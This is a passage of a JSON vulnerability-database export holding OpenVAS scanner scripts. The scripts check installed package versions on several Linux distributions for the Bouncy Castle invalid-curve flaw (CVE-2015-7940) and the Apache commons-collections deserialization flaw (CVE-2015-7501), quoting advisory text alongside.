rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpkix-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpkix-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:09", "description": "Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3417-1 (bouncycastle - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703417", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3417.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3417-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703417\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-7940\");\n script_name(\"Debian Security Advisory DSA 3417-1 (bouncycastle - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-14 00:00:00 +0100 (Mon, 14 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3417.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8)\");\n script_tag(name:\"affected\", value:\"bouncycastle on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\");\n script_tag(name:\"summary\", value:\"Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpkix-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpkix-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:01", "description": "Oracle Linux Local Security Checks ELSA-2015-2521", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2521", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122792", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2521.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122792\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-02 11:24:54 +0200 (Wed, 02 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2521\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2521 - jakarta-commons-collections security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2521\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2521.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-javadoc\", rpm:\"jakarta-commons-collections-javadoc~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework\", rpm:\"jakarta-commons-collections-testframework~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework-javadoc\", rpm:\"jakarta-commons-collections-testframework-javadoc~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-tomcat5\", rpm:\"jakarta-commons-collections-tomcat5~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:07", "description": "Mageia Linux Local Security Checks mgasa-2016-0012", "cvss3": {}, "published": "2016-01-14T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0012", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131177", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131177", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0012.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131177\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-14 07:28:50 +0200 (Thu, 14 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0012\");\n script_tag(name:\"insight\", value:\"It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library (CVE-2015-7501). With this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property org.apache.commons.collections.enableUnsafeSerialization to re-enable their deserialization.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0012.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0012\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~24.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:58:59", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120608", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120608\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-12-15 02:51:21 +0200 (Tue, 15 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-618)\");\n script_tag(name:\"insight\", value:\"It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.\");\n script_tag(name:\"solution\", value:\"Run yum update apache-commons-collections to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-618.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache-commons-collections-testframework-javadoc\", rpm:\"apache-commons-collections-testframework-javadoc~3.2.1~11.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~11.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache-commons-collections-javadoc\", rpm:\"apache-commons-collections-javadoc~3.2.1~11.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache-commons-collections-testframework\", rpm:\"apache-commons-collections-testframework~3.2.1~11.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "openvas", "title": "RedHat Update for apache-commons-collections RHSA-2015:2522-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871511", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871511", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apache-commons-collections RHSA-2015:2522-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871511\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-01 06:13:14 +0100 (Tue, 01 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for apache-commons-collections RHSA-2015:2522-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Apache Commons Collections library\nprovides new interfaces, implementations, and utilities to extend the features\nof the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the linked references.\n\nAll users of apache-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"apache-commons-collections on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2522-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00071.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~22.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:08", "description": "Check the version of jakarta-commons-collections", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "openvas", "title": "CentOS Update for jakarta-commons-collections CESA-2015:2521 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-03-11T00:00:00", "id": "OPENVAS:1361412562310882333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for jakarta-commons-collections CESA-2015:2521 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882333\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-03 06:32:59 +0100 (Thu, 03 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for jakarta-commons-collections CESA-2015:2521 centos6\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/11258\");\n\n script_tag(name:\"summary\", value:\"Check the version of jakarta-commons-collections\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Jakarta/Apache Commons Collections\nlibrary provides new interfaces, implementations, and utilities to extend the\nfeatures of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the linked references.\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to the linked KB article.\n\n5. Bugs fixed:\n\n1279330 - CVE-2015-7501 apache-commons-collections: InvokerTransformer code execution during deserialisation\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\njakarta-commons-collections-3.2.1-3.5.el6_7.src.rpm\n\nnoarch:\njakarta-commons-collections-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-javadoc-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-testframework-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7.noarch.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\njakarta-commons-collections-3.2.1-3.5.el6_7.src.rpm\n\nnoarch:\njakarta-commons-collections-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-javadoc-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-testframework-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7.noarch.rpm\njakarta-commons-collections-tomcat5-3.2.1-3.5. ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"jakarta-commons-collections on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:2521\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-December/021512.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n 